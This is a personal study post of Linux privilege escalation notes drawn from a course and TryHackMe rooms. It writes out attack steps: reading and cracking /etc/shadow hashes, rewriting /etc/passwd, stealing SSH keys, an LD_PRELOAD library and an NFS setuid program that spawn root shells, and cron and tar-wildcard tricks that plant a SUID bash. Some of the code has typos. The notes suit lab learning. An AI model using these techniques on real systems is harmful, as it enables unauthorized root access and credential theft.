Linux Privilege Escalation

Good Evening here i will publish my Notes For Linux Privilege Escalation From my Study and Heath Adams Course + Try hack me room i wish it useful For You and i will leave you some links to make it easy for you

That’s my linked in account if you want to Follow me : https://www.linkedin.com/in/kerolos-ashraf-270b20219/

my mindmap For Linux Priv Just open Link and click Download : https://drive.google.com/file/d/1zmEDv_vMt8nryelvePr99OJ-4OWGRA9W/view?usp=share_link

https://github.com/TCM-Course-Resources/Linux-Privilege-Escalation-Resources

https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/

https://book.hacktricks.xyz/linux-hardening/linux-privilege-escalation-checklist

Rooms : https://tryhackme.com/room/linprivesc . https://tryhackme.com/room/commonlinuxprivesc . https://tryhackme.com/room/linuxprivescarena

Manual enumeration :

💡 1- System Enumeration :

• hostname ⇒ name that identifies a device in a network
• uname -a ,, cat /etc/issue ,, cat /proc/version => get info about kernal or
• lscpu => get info about cpu and treads
• ps aux | grep "root" ⇒ get process run as root perm
• ps aux | grep “root” =>Enumerating Program Versions
• dpkg -l | grep <program> => dpkg can show installed programs and their version

💡 2- User Enumeration

• whoami ⇒ get current user
• id ⇒ get user identification in system
• sudo -l => get what we can run as root without pass
• cat /etc/passwd
• cat /etc/shadow

💡 3- Network Enumeration

• ifconfig / ip a ⇒ get information about network
• ip route ⇒ print routing table
• arp -a / ip neigh ⇒ get arp cache
• netstat -ano ⇒ get listen ports and connected ports

Privilege Escalation :

💡 1- Kernal Exploitaion

1. exec uname -a get the version of kernal || run linux-exploit-suggester script
2. searchsploit kernel || looking in GHDB or https://github.com/lucyoa/kernel-exploits

💡 2- Password Hunting :

looking for history of user with command : history

1. run linpeas

💡 3- weak file permission

etc/shadow : look for permission if we can read /etc/shadow → cat file and get hash and run john against root hash

• john — wordlist=/usr/share/wordlists/rockyou.txt hash.txt

etc/passwd : if we can writable in it we will Generate a new password hash with a password

• openssl passwd new_password
• Edit the /etc/passwd file and place the generated password hash between the first and second colon (:) of the root user’s row (replacing the “x”). → then switch to root
• Find all directories which can be written to : find / -executable -writable -type d 2> /dev/null
• Find all writable files in /etc : find /etc -maxdepth 1 -writable -type f
• Find all readable files in /etc : find /etc -maxdepth 1 -readable -type f

💡 4- SSH Key

look for ssh key :

• find / -name authorized_keys 2> /dev/null
• find / -name id_rsa 2> /dev/null
• if we found SSH KEY Copy the key over to your local machine, and give it permissions (600)
• chmod 600 root_key
• grep PermitRootLogin /etc/ssh/sshd_config ⇒ make this step to know if machine allowed root log with ssh or not
• use it to login to ssh if we allowed that : ssh -i root_key root@192.168.1.25

💡 5- sudo ( shell escape sequences ) : Best one for me

• regular user can do something as root without password then get privilege
• sudo -l ⇒ list all things we can do
• https://gtfobins.github.io/ go to and look for way to escalate your privilege

🤡 Another Technique :

• if we have something in sudo escape have a specific Function like apache then we can get root hash with :
• sudo apache2 -f /etc/shadow
• extract hashes then use su

💡 6- Environment Variables ( LD_PRELOAD )

• Programs run through sudo can inherit the environment variables
• LD Mean Dynamic Linker
• Trick here we are going to make malicious library run before any other libraries

🤡 steps :

1. Check for LD_PRELOAD (with the env_keep option)
2. Write a simple C code compiled as a share object (.so extension) file
3. Run the program with sudo rights and the LD_PRELOAD option pointing to our .so file

**#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h> 
void _init() {
    unsetenv("LD_PRELOAD");
    setgid(0);
    setuid(0);
    system("/bin/bash");
}**

• save as shell.c
• Compile code : gcc -fPIC -shared -o /tmp/shell.so shell.c -nostartfiles
• run the program by specifying the LD_PRELOAD option ⇒ sudo LD_PRELOAD=/tmp/shell.so (any service from sudo -l )

💡 7- SUID ( user + s (pecial) )

• SUID always executes as the user who owns the file
• if root is the owner of simple bash script && regular user has SUID then he can execute script as root (owner)
• find / -perm -u=s -type f 2>/dev/null

• go to https://gtfobins.github.io/ and look for exploit
• may be all of result can’t be vulnerable

💡 8- Capabilities

• Before capabilities, we only had the binary system of privileged and non-privileged processes to performing permission check ,, such as Root has UID Zero and default user has UID Non Zero
• Capabilities : similar to SUID But there is a difference
• Capabilities : maintained by the kernel are those permissions that divide the privileges of kernel user or kernel level programs into small pieces
• SUID : Stands for set user ID and allows users to execute the file as the file owner
• Find out what capabilities are Enabled : getcap -r / 2>/dev/null
• search in google with capabilities name to get privilege
• and it’s the most common capabilitites and explain what to do :

💡 9- Cron Jobs

• Cron jobs are programs or scripts which users can schedule to run at specific times or intervals.
• Cron jobs run with the security level of the user who owns them
• it stored in :
• /etc/crontab The system-wide crontab is located at
• /var/spool/cron/
• /var/spool/cron/crontabs/

😃 Overwrite Cron File

1. View the contents of the system-wide crontab: cat /etc/crontab
2. let’s say we find that

3. Locate the location of File : Locate [overwrite.sh](<http://overwrite.sh>)

4. show our permission for this file : ls -la

5. remove the original file and maka a new one with privilege Technique

6. nano /usr/local/bin/overwrite.sh

#!/bin/bash 
cp /bin/bash /tmp/bash
 chmod +xs /tmp/bash

1. then wait a minute to work and run : /tmp/bash -p

🤡 WildCard Cron jobs :

• Steps For Detect

1. cat /etc/crontab
2. notice the script “/usr/local/bin/compress.sh”
3. cat /usr/local/bin/compress.sh
4. notice the wildcard (*) used by ‘tar’.

• Steps For Exploit :

1. make this script

echo 'cp /bin/bash /tmp/bash; chmod +s /tmp/bash' > /home/user/runme.sh

2. touch /home/user/ — checkpoint=1

3. touch /home/user/ — checkpoint-action=exec=sh\ runme.sh

4. Wait 1 minute for the Bash script to execute.

5. /tmp/bash -p

6. type : id

💡 10- NFS (Network File System) : Privilege

configured in the /etc/exports

• Steps For check and attack

1. we check if it Vulnerable or not when we see “no_root_squash” in output

2. enumerating mountable shares from our attacking machine. : showmount -e ip

3. Mount an NFS share which have “no_root_squash” in output ⇒ mount -o rw,vers=2 <target ipt>:/<share folder> <directory in my machine

4. then make script .c in my machine and it will change automatic in target machine

int main()
{stegid(0);
setuid(0);
system("/bin/bash");
return 0;
}

1. then compile it and make it executable : gcc nfs.c -o nf -w
2. chmod +s nf
3. and run it